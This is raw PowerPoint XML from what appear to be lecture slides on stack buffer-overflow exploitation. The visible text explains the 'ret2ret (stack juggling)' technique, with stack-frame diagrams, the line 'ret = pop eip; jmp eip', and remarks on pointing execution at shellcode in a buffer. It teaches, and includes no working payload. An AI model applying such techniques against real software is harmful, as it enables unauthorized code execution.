              <a:chOff x="6146840" y="1380239"/>
              <a:chExt cx="3859159" cy="3053570"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="TextBox 48"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6146840" y="1380239"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="52" name="Elbow Connector 51"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="53" idx="3"/>
                <a:endCxn id="49" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="7008839" y="1564905"/>
                <a:ext cx="20062" cy="2027114"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val -1139463"/>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166902" y="3407353"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="54" name="TextBox 53"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7151235" y="1897181"/>
                <a:ext cx="1449661" cy="523220"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>To previous stack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                  <a:t> frame pointer</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="56" name="Elbow Connector 55"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="58" idx="3"/>
                <a:endCxn id="57" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7040202" y="3321062"/>
                <a:ext cx="787805" cy="65108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7122241" y="3972144"/>
                <a:ext cx="1411532" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                  <a:t>To  the instruction following call site</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="TextBox 57"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6178203" y="3136396"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="59" name="TextBox 58"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9144000" y="3523994"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="TextBox 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7114480" y="5154698"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="TextBox 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9403419" y="1752157"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="6553202"/>
            <a:ext cx="2133600" cy="212725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{409B0DB6-FE60-6640-9ADF-6917FC3B4E1F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164700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3200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="3199"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>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200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="3199"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="22" presetClass="entr" presetSubtype="4"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3000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="2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3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ret2ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38914" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>If there is a valuable (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> on a stack, you might consider this technique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="stack3.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2540000"/>
            <a:ext cx="1690688" cy="418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5138738" y="4132044"/>
            <a:ext cx="3767328" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2420938" y="4578350"/>
            <a:ext cx="1235075" cy="187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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>overwrite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414588" y="40957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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414588" y="36385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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414588" y="31813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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="944563" y="4318000"/>
            <a:ext cx="1246187" cy="369888"/>
            <a:chOff x="945163" y="4318669"/>
            <a:chExt cx="1245430" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Notched Right Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1521075" y="4469255"/>
              <a:ext cx="669518" cy="16643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latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38927" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="945163" y="4318669"/>
              <a:ext cx="532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rebuchet MS" charset="0"/>
                </a:rPr>
                <a:t>esp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138738" y="4992469"/>
            <a:ext cx="3483721" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“stack juggling”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2803525"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="30196"/>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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3662363" y="2752873"/>
            <a:ext cx="5403437" cy="892552"/>
            <a:chOff x="3662363" y="2752873"/>
            <a:chExt cx="5403437" cy="892552"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3662363" y="2911884"/>
              <a:ext cx="1264043" cy="2565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953000" y="2752873"/>
              <a:ext cx="4112800" cy="892552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>(usually resides in</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>buf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>, but how to point there?)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651426" y="2963714"/>
            <a:ext cx="829100" cy="2875509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 829100"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2875509"/>
              <a:gd name="connsiteX1" fmla="*/ 829068 w 829100"/>
              <a:gd name="connsiteY1" fmla="*/ 1234881 h 2875509"/>
              <a:gd name="connsiteX2" fmla="*/ 35280 w 829100"/>
              <a:gd name="connsiteY2" fmla="*/ 2875509 h 2875509"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="829100" h="2875509">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="411594" y="377815"/>
                  <a:pt x="823188" y="755630"/>
                  <a:pt x="829068" y="1234881"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="834948" y="1714132"/>
                  <a:pt x="35280" y="2875509"/>
                  <a:pt x="35280" y="2875509"/>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3191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4.68934E-6 -0.00046 L -4.68934E-6 -0.05738 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2846"/>
                                    </p:animMotion>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4.68934E-6 -0.05738 L -4.68934E-6 -0.12518 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3401"/>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4.68934E-6 -0.12541 L -4.68934E-6 -0.1969 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3586"/>
                                    </p:animMotion>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4.68934E-6 -0.1969 L -4.68934E-6 -0.2559 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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4" grpId="0"/>
      <p:bldP spid="15"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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2ret (stack juggling)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38914" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
